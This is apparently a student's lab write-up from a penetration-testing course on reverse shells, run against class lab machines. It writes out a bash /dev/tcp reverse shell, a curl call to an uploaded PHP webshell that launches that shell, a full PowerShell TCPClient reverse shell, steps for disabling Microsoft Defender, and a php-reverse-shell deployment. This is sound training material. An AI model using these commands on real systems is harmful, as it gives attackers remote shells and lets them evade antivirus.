Class Activity 8.2 - Reverse Shells

A reverse shell occurs when we convince the target to connect to the attacker. This vastly simplifies command and control because firewall egress rules are nearly always more permissive than ingress rules. Even so, Windows 10 will present us with a problem. In the spirit of living off the land, we will spend some time using target native tools (as opposed to uploading or installing nc on the target) to create a command and control channel between the target and kali. The "target" is not actually a pen testing target but just a generic Rocky 8.5 Linux server that we can practice on. Some exercises will leverage our previously exploited systems.

Reverse Shell Reference: https://www.invicti.com/learn/reverse-shell/

Bash Reverse Shell on Linux

  • Login to sec335-rocky (10.0.17.200) from kali using ssh and your cyber.local credentials

  • Determine your DHCP address from your kali vm's eth0

    • 10.0.17.44

  • On Kali, create a nc listener on 4449/tcp 

nc -nlvp 4449

  • On Rocky use a native bash reverse shell to connect bcak to your listener 

/bin/bash -i >& /dev/tcp/10.0.17.44/4449 0>&1

  • You should see a line in your kali terminal saying that 10.0.17.200 has connected to your kali box!

    • You should also see that the user is no long user@kali but the user from the other host

  • Interact with sec335-rocky over your nc session

    • whomai

    • hostname

Traffic Analysis of bash reverse shell

Deliverable 1. Run wireshark, create a capture filter on 4449/tcp, and capture a command or two entered through the nc session.

56KB
8.2_NC_Listener.pcapng

  • filter for port 4449 by tcp.port == 4449

  • This packet is the command whoamithat I ran

  • This packet is the response to the whoami command (hannelore.sanokklis)

The reason why the packets for the query and the response are not one after the other is because the network split up the packets so they were smaller. Different networks may split up networks differently.

Deliverable 2. Try this out on Pippen by leveraging an uploaded webshell or reverse shell on pippen to run a similar command to connect back to a listener. You may need to upload a small shell script to make this happen, particularly if you are using the simple-backdoor.php script. Provide a screenshot similar to the one below that shows you invoking the reverse shell on the target via curl or your web browser and catching the connection on your kali box.

  • Interact with a php script in your webrowser to see if its actually returns something before you curl the site. You can see in the image below that the simple-backdoor.php bcakdoor returns something when you load it in the browser.

Troubleshooting:

I first ssh'ed into Pipping with ssh peregrin.took@10.0.5.25 I was running the curl command curl http://10.0.5.25/upload/sparkle.php?cmd="whoami" to test and make sure I could connect to the file on the server before I ran the nc command. The problem was that I was trying to connect to 10.0.5.25, when I already in the pippin host with the 10.0.5.25 Ip address, so doing that command was like trying to get commands from the local host, and thus nothing was returning. To fix this I just exited out of my ssh session and ran the

  • curl http://10.0.5.25/upload/sparkle.php?cmd-"whoami"

Technically this worked, but my sparkle.php script contained nothing, so I wasn't getting a 404 error but I also wasn't getting anything back in my terminal.

I then changed the script I was using to simple-backdoor.php backdoor and it worked. So the final command to get the whoami response was:

  • curl http://10.0.5.25/upload/simple-backdoor.php?cmd="whoami"

  • Below is the working command 

curl http://10.0.5.25/upload/simple-backdoor.php?cmd=/bin/bash -i >& /dev/tcp/10.0.17.44/4449 0>&1
Visulization of the connection

The host machine makes a connection to 10.0.5.25 via curl. We then start a Netcat listener on port 4449 on the host machine. We execute a command on 10.0.5.25 via a backdoor that was uploaded to the server via ftp to connect back to the netcat listener on the host machine.

Successful connection back to the NC listener via the 10.0.5.25 server

Windows Powershell Reverse Shell

Reference: https://book.hacktricks.xyz/shells/shells/windows

The following powershell code is run via cmd.exe. 

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Change ATTACKERIP and ATTACKERPORT to the eth0 IP on kali and port you assigned to a nc listener.

  • IP is 10.0.17.44

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKERIP',ATTACKERPORT); $stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.length)) -ne 0){;$data= (New-Object -TypeName System.Text.ASCIIENcoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Microsoft Defender to the Rescue

Microsoft Defender is an outstanding antivirus platform and it knows we are up to no good, in order to progress with the example we will need to turn off AV protection. Figure out how to do this. We will need to consider Microsoft Defender and other host based protections in our penetration testing efforts.

Turn off AV Protection

  1. Select the Start menu.

  2. Search for Windows Security.

  3. Select Virus & threat protection.

  4. Under Virus & threat protection settings, select Manage settings.

  5. Under Real-time protection, change the setting to Off.

Deliverable 3. Access your windows VM. Provide a screenshot similar to the one below that shows the unsuccessful execution of powershell via cmd.exe followed by the successful reverse shell after you figure out how to turn off Windows Defender.

The script is turning up with errors, the professor is currently working on what is wrong.

Deliverable 4. Hit the internet, see if you can create a python2,3 or php reverse shell on any of the linux targets. Show the command running and the full text of the command used and the results of the id command invoked on the rocky through the reverse shell.

Reference: https://www.kali.org/tools/webshells/

  • You can find a default reverse-shell in the following directory:

    • /usr/share/webshells/php-reverse-shell.php

  • Copy php-reverse-shell.php into your week8 directory

Troubleshooting: When I ran the the file in the browser I kept getting the following error: WARNING: Failed to daemonise. This is qiote common and not fatal. Connection refused (111) After doing some reserach I found that this is because you have to hardcode the IP address and port number into the file. Since I didn't do this it wasn't working.

  • I changed my file name to be more unique --> reverse-ur-mom.php

    • sudo nano reverse-ur-mom.php

    • Find the section in the file that says CHANGE THIS and input the Ip address and port you are connecting to

      • 10.0.17.44 and 4449

  • upload the file with the hardcoded Ip address into the FTP server of 10.0.5.25

  • Run netcat

    • nc -nlvp 4449

  • In another terminal window run the following command: 

curl http://10.0.5.25/upload/reverse-ur-mom.php

Your netcat window should populate with the connection!

PreviousClass Activity 8.1 - WeevelyNextModule 9: SQLi and Exploiting Gloin

Last updated